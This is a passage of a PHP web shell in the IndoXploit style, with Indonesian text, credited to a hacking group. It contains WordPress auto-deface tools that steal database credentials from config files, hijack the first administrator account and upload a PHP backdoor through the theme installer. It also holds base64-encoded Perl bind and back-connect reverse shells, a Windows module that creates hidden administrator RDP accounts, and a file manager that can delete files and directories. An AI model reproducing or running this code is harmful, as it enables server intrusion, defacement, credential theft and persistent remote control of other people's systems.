1497. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1498. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1499. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1500. $data3 = curl_exec($ch);
1501. curl_close($ch);
1502. $y = date("Y");
1503. $m = date("m");
1504. $namafile = "id.php";
1505. $fpi = fopen($namafile,"w");
1506. fputs($fpi,$script);
1507. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1508. curl_setopt($ch6, CURLOPT_POST, true);
1509. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1510. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1511. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1512. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1513. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1514. $postResult = curl_exec($ch6);
1515. curl_close($ch6);
1516. $as = "$target/k.php";
1517. $bs = anucurl($as);
1518. if(preg_match("#$script#is", $bs)) {
1519. echo "[+] <font color='red'>berhasil</font><br>";
1520. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1521. } else {
1522. echo "[-] <font color='red'>gagal</font><br>";
1523. echo "[!!] Silahkan coba dengan cara manual: <br>";
1524. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1525. echo "[+] username: <font color=red>$user</font><br>";
1526. echo "[+] password: <font color=red>$pass</font><br><br>";
1527. }
1528. mysql_close($conn);
1529. }
1530. }
1531. }
1532. } else {
1533. echo "<center><h1>WordPress Auto Deface</h1>
1534. <form method='post'>
1535. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1536. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1537. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1538. </form>
1539. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1540. </center>";
1541. }
1542. } elseif($_GET['do'] == 'auto_dwp2') {
1543. if($_POST['auto_deface_wp']) {
1544. function anucurl($sites) {
1545. $ch = curl_init($sites);
1546. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1547. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1548. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1549. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1550. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1551. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1552. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1553. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1554. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1555. $data = curl_exec($ch);
1556. curl_close($ch);
1557. return $data;
1558. }
1559. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1560. $post = array(
1561. "log" => "$userr",
1562. "pwd" => "$pass",
1563. "rememberme" => "forever",
1564. "wp-submit" => "$wp_submit",
1565. "redirect_to" => "$web",
1566. "testcookie" => "1",
1567. );
1568. $ch = curl_init($cek);
1569. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1570. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1571. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1572. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1573. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1574. curl_setopt($ch, CURLOPT_POST, 1);
1575. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1576. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1577. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1578. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1579. $data = curl_exec($ch);
1580. curl_close($ch);
1581. return $data;
1582. }
1583. $link = explode("\r\n", $_POST['link']);
1584. $script = htmlspecialchars($_POST['script']);
1585. $user = "indoxploit";
1586. $pass = "indoxploit";
1587. $passx = md5($pass);
1588. foreach($link as $dir_config) {
1589. $config = anucurl($dir_config);
1590. $dbhost = ambilkata($config,"DB_HOST', '","'");
1591. $dbuser = ambilkata($config,"DB_USER', '","'");
1592. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1593. $dbname = ambilkata($config,"DB_NAME', '","'");
1594. $dbprefix = ambilkata($config,"table_prefix = '","'");
1595. $prefix = $dbprefix."users";
1596. $option = $dbprefix."options";
1597. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1598. $db = mysql_select_db($dbname);
1599. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1600. $result = mysql_fetch_array($q);
1601. $id = $result[ID];
1602. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1603. $result2 = mysql_fetch_array($q2);
1604. $target = $result2[option_value];
1605. if($target == '') {
1606. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1607. } else {
1608. echo "[+] $target <br>";
1609. }
1610. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1611. if(!$conn OR !$db OR !$update) {
1612. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1613. mysql_close($conn);
1614. } else {
1615. $site = "$target/wp-login.php";
1616. $site2 = "$target/wp-admin/theme-install.php?upload";
1617. $b1 = anucurl($site2);
1618. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1619. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1620. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1621. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1622. $www = "m.php";
1623. $fp5 = fopen($www,"w");
1624. fputs($fp5,$upload3);
1625. $post2 = array(
1626. "_wpnonce" => "$anu2",
1627.  
1628. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1629. "themezip" => "@$www",
1630. "install-theme-submit" => "Install Now",
1631. );
1632. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1633. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1634. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1635. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1636. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1637. curl_setopt($ch, CURLOPT_POST, 1);
1638. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1639. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1640. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1641. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1642. $data3 = curl_exec($ch);
1643. curl_close($ch);
1644. $y = date("Y");
1645. $m = date("m");
1646. $namafile = "id.php";
1647. $fpi = fopen($namafile,"w");
1648. fputs($fpi,$script);
1649. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1650. curl_setopt($ch6, CURLOPT_POST, true);
1651. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1652. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1653. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1654. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1655. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1656. $postResult = curl_exec($ch6);
1657. curl_close($ch6);
1658. $as = "$target/k.php";
1659. $bs = anucurl($as);
1660. if(preg_match("#$script#is", $bs)) {
1661. echo "[+] <font color='red'>berhasil mepes...</font><br>";
1662. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1663. } else {
1664. echo "[-] <font color='red'>gagal mepes...</font><br>";
1665. echo "[!!] coba aja manual: <br>";
1666. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1667. echo "[+] username: <font color=red>$user</font><br>";
1668. echo "[+] password: <font color=red>$pass</font><br><br>";
1669. }
1670. mysql_close($conn);
1671. }
1672. }
1673. } else {
1674. echo "<center><h1>WordPress Auto Deface V.2</h1>
1675. <form method='post'>
1676. Link Config: <br>
1677. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1678. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1679. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1680. </form></center>";
1681. }
1682. } elseif($_GET['do'] == 'network') {
1683. echo "<form method='post'>
1684. <u>Bind Port:</u> <br>
1685. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1686. <input type='submit' name='sub_bp' value='>>'>
1687. </form>
1688. <form method='post'>
1689. <u>Back Connect:</u> <br>
1690. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1691. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1692. <input type='submit' name='sub_bc' value='>>'>
1693. </form>";
1694. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1695. if(isset($_POST['sub_bp'])) {
1696. $f_bp = fopen("/tmp/bp.pl", "w");
1697. fwrite($f_bp, base64_decode($bind_port_p));
1698. fclose($f_bp);
1699.  
1700. $port = $_POST['port_bind'];
1701.  
1702. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1703. sleep(1);
1704. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1705. unlink("/tmp/bp.pl");
1706. }
1707. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1708. if(isset($_POST['sub_bc'])) {
1709. $f_bc = fopen("/tmp/bc.pl", "w");
1710. fwrite($f_bc, base64_decode($bind_connect_p));
1711. fclose($f_bc);
1712.  
1713. $ipbc = $_POST['ip_bc'];
1714. $port = $_POST['port_bc'];
1715. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1716. sleep(1);
1717. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1718. unlink("/tmp/bc.pl");
1719. }
1720. } elseif($_GET['do'] == 'krdp_shell') {
1721. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1722. if($_POST['create']) {
1723. $user = htmlspecialchars($_POST['user']);
1724. $pass = htmlspecialchars($_POST['pass']);
1725. if(preg_match("/$user/", exe("net user"))) {
1726. echo "[INFO] -> <font color=red>user <font color=red>$user</font> sudah ada</font>";
1727. } else {
1728. $add_user = exe("net user $user $pass /add");
1729. $add_groups1 = exe("net localgroup Administrators $user /add");
1730. $add_groups2 = exe("net localgroup Administrator $user /add");
1731. $add_groups3 = exe("net localgroup Administrateur $user /add");
1732. echo "[ RDP ACCOUNT INFO ]<br>
1733. ------------------------------<br>
1734. IP: <font color=red>".$ip."</font><br>
1735. Username: <font color=red>$user</font><br>
1736. Password: <font color=red>$pass</font><br>
1737. ------------------------------<br><br>
1738. [ STATUS ]<br>
1739. ------------------------------<br>
1740. ";
1741. if($add_user) {
1742. echo "[add user] -> <font color='red'>Berhasil</font><br>";
1743. } else {
1744. echo "[add user] -> <font color='red'>Gagal</font><br>";
1745. }
1746. if($add_groups1) {
1747. echo "[add localgroup Administrators] -> <font color='red'>Berhasil</font><br>";
1748. } elseif($add_groups2) {
1749. echo "[add localgroup Administrator] -> <font color='red'>Berhasil</font><br>";
1750. } elseif($add_groups3) {
1751. echo "[add localgroup Administrateur] -> <font color='red'>Berhasil</font><br>";
1752. } else {
1753. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1754. }
1755. echo "------------------------------<br>";
1756. }
1757. } elseif($_POST['s_opsi']) {
1758. $user = htmlspecialchars($_POST['r_user']);
1759. if($_POST['opsi'] == '1') {
1760. $cek = exe("net user $user");
1761. echo "Checking username <font color=red>$user</font> ....... ";
1762. if(preg_match("/$user/", $cek)) {
1763. echo "[ <font color=red>Sudah ada</font> ]<br>
1764. ------------------------------<br><br>
1765. <pre>$cek</pre>";
1766. } else {
1767. echo "[ <font color=red>belum ada</font> ]";
1768. }
1769. } elseif($_POST['opsi'] == '2') {
1770. $cek = exe("net user $user indoxploit");
1771. if(preg_match("/$user/", exe("net user"))) {
1772. echo "[change password: <font color=red>indoxploit</font>] -> ";
1773. if($cek) {
1774. echo "<font color=red>Berhasil</font>";
1775. } else {
1776. echo "<font color=red>Gagal</font>";
1777. }
1778. } else {
1779. echo "[INFO] -> <font color=red>user <font color=red>$user</font> belum ada</font>";
1780. }
1781. } elseif($_POST['opsi'] == '3') {
1782. $cek = exe("net user $user /DELETE");
1783. if(preg_match("/$user/", exe("net user"))) {
1784. echo "[remove user: <font color=red>$user</font>] -> ";
1785. if($cek) {
1786. echo "<font color=red>Berhasil</font>";
1787. } else {
1788. echo "<font color=red>Gagal</font>";
1789. }
1790. } else {
1791. echo "[INFO] -> <font color=red>user <font color=red>$user</font> belum ada</font>";
1792. }
1793. } else {
1794. //
1795. }
1796. } else {
1797. echo "-- Create RDP --<br>
1798. <form method='post'>
1799. <input type='text' name='user' placeholder='username' value='indoxploit' required>
1800. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
1801. <input type='submit' name='create' value='>>'>
1802. </form>
1803. -- Option --<br>
1804. <form method='post'>
1805. <input type='text' name='r_user' placeholder='username' required>
1806. <select name='opsi'>
1807. <option value='1'>Cek Username</option>
1808. <option value='2'>Ubah Password</option>
1809. <option value='3'>Hapus Username</option>
1810. </select>
1811. <input type='submit' name='s_opsi' value='>>'>
1812. </form>
1813. ";
1814. }
1815. } else {
1816. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1817. }
1818. } elseif($_GET['act'] == 'newfile') {
1819. if($_POST['new_save_file']) {
1820. $newfile = htmlspecialchars($_POST['newfile']);
1821. $fopen = fopen($newfile, "a+");
1822. if($fopen) {
1823. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1824. } else {
1825. $act = "<font color=red>permission denied</font>";
1826. }
1827. }
1828. echo $act;
1829. echo "<form method='post'>
1830. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1831. <input type='submit' name='new_save_file' value='Ganti'>
1832. </form>";
1833. } elseif($_GET['act'] == 'newfolder') {
1834. if($_POST['new_save_folder']) {
1835. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1836. if(!mkdir($new_folder)) {
1837. $act = "<font color=red>permission denied</font>";
1838. } else {
1839. $act = "<script>window.location='?dir=".$dir."';</script>";
1840. }
1841. }
1842. echo $act;
1843. echo "<form method='post'>
1844. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1845. <input type='submit' name='new_save_folder' value='Submit'>
1846. </form>";
1847. } elseif($_GET['act'] == 'rename_dir') {
1848. if($_POST['dir_rename']) {
1849. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1850. if($dir_rename) {
1851. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1852. } else {
1853. $act = "<font color=red>permission denied</font>";
1854. }
1855. echo "".$act."<br>";
1856. }
1857. echo "<form method='post'>
1858. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1859. <input type='submit' name='dir_rename' value='ganti nama'>
1860. </form>";
1861. } elseif($_GET['act'] == 'delete_dir') {
1862. if(is_dir($dir)) {
1863. if(is_writable($dir)) {
1864. @rmdir($dir);
1865. @exe("rm -rf $dir");
1866. @exe("rmdir /s /q $dir");
1867. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1868. } else {
1869. $act = "<font color=red>could not remove ".basename($dir)."</font>";
1870. }
1871. }
1872. echo $act;
1873. } elseif($_GET['act'] == 'view') {
1874. echo "File: <font color=red>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>lihat</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>ganti nama</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>hapus</a> ]<br>";
1875. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1876. } elseif($_GET['act'] == 'edit') {
1877. if($_POST['save']) {
1878. $save = file_put_contents($_GET['file'], $_POST['src']);
1879. if($save) {
1880. $act = "<font color=red>Telah di simpan!</font>";
1881. } else {
1882. $act = "<font color=red>permission denied</font>";
1883. }
1884. echo "".$act."<br>";
1885. }
1886. echo "File: <font color=red>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>lihat</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>ganti nama</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>hapus</a> ]<br>";
1887. echo "<form method='post'>
1888. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1889. <input type='submit' value='SIMPAN' name='save' style='width: auto;'>
1890. </form>";
1891. } elseif($_GET['act'] == 'rename') {
1892. if($_POST['do_rename']) {
1893. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1894. if($rename) {
1895. $act = "<script>window.location='?dir=".$dir."';</script>";
1896. } else {
1897. $act = "<font color=red>permission denied</font>";
1898. }
1899. echo "".$act."<br>";
1900. }
1901. echo "File: <font color=red>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>lihat</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>ganti nama</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>hapus</a> ]<br>";
1902. echo "<form method='post'>
1903. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1904. <input type='submit' name='do_rename' value='ganti nama'>
1905. </form>";
1906. } elseif($_GET['act'] == 'delete') {
1907. $delete = unlink($_GET['file']);
1908. if($delete) {
1909. $act = "<script>window.location='?dir=".$dir."';</script>";
1910. } else {
1911. $act = "<font color=red>permission denied</font>";
1912. }
1913. echo $act;
1914. } else {
1915. if(is_dir($dir) === true) {
1916. if(!is_readable($dir)) {
1917. echo "<font color=red>Direktori tidak dapat dibuka</font>";
1918. } else {
1919. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1920. <tr>
1921. <th class="th_home"><center>Nama file/folder</center></th>
1922. <th class="th_home"><center>Tipe</center></th>
1923. <th class="th_home"><center>Ukuran</center></th>
1924. <th class="th_home"><center>Terakhir di edit</center></th>
1925. <th class="th_home"><center>Permission</center></th>
1926. </tr>'; $scandir = scandir($dir);
1927. foreach($scandir as $dirx) {
1928. $dtype = filetype("$dir/$dirx");
1929. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1930. if(function_exists('posix_getpwuid')) {
1931. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1932. $downer = $downer['name'];
1933. } else {
1934. //$downer = $uid;
1935. $downer = fileowner("$dir/$dirx");
1936. }
1937. if(function_exists('posix_getgrgid')) {
1938. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1939. $dgrp = $dgrp['name'];
1940. } else {
1941. $dgrp = filegroup("$dir/$dirx");
1942. }
1943.  
1944. if(!is_dir("$dir/$dirx")) continue;
1945. if($dirx === '..') {
1946. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1947. } elseif($dirx === '.') {
1948. $href = "<a href='?dir=$dir'>$dirx</a>";
1949. } else {
1950. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1951. }
1952. if($dirx === '.' || $dirx === '..') {
1953. $act_dir = "<a href='?act=newfile&dir=$dir'>buat file</a> | <a href='?act=newfolder&dir=$dir'>buat folder</a>";
1954. } else {
1955. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>ganti nama</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>hapus</a>";
1956. }
1957. echo "<tr>";
1958. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1959. echo "<td class='td_home'><center>$dtype</center></td>";
1960. echo "<td class='td_home'><center>-</center></th></td>";
1961. echo "<td class='td_home'><center>$dtime</center></td>";
1962. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1963. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1964. echo "</tr>";
1965. }
1966. }
1967. } else {
1968. echo "<font color=red>can't open directory.</font>";
1969. }
1970. foreach($scandir as $file) {
1971. $ftype = filetype("$dir/$file");
1972. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1973. $size = filesize("$dir/$file")/1024;
1974. $size = round($size,3);
1975. if(function_exists('posix_getpwuid')) {
1976. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1977. $fowner = $fowner['name'];
1978. } else {
1979. //$downer = $uid;
1980. $fowner = fileowner("$dir/$file");
1981. }
1982. if(function_exists('posix_getgrgid')) {
1983. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1984. $fgrp = $fgrp['name'];
1985. } else {
1986. $fgrp = filegroup("$dir/$file");
1987. }
1988. if($size > 1024) {
1989. $size = round($size/1024,2). 'MB';
1990. } else {
1991. $size = $size. 'KB';
1992. }
1993. if(!is_file("$dir/$file")) continue;
1994. echo "<tr>";
1995. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1996. echo "<td class='td_home'><center>$ftype</center></td>";
1997. echo "<td class='td_home'><center>$size</center></td>";
1998. echo "<td class='td_home'><center>$ftime</center></td>";
1999. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2000. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>ganti nama</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>hapus</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2001. echo "</tr>";
2002. }
2003. echo "</table>";
2004. if(!is_readable($dir)) {
2005. //
2006. } else {
2007. echo "";
2008. }
2009. {
2010. echo "<br><br><center>";
2011. echo "========================================================================================================<br>";
2012. echo "Sistem Server: <font color=red>".$kernel."</font><br>";
2013. echo "IP Server: <font color=red>".$ip."</font><br>";
2014. echo "IP Kamu: <font color=red>".$_SERVER['REMOTE_ADDR']."</font><br>";
2015. echo "Harddisk Server: <font color=red>$used</font> dari <font color=red>$total</font> ( Ruang kosong: <font color=red>$freespace</font> )<br>";}
2016. echo "Safe Mode: $sm<br>";
2017. echo "========================================================================================================<br><br><br></center>";
2018. echo "<center>>>> Copyright &copy; 2017 - <a href='https://www.facebook.com/groups/164625240738567/' target='_blank'><font color=white>Wolf Solidarity Team</a> <<<</font></center>";
2019. }
2020. ?>
2021. </html>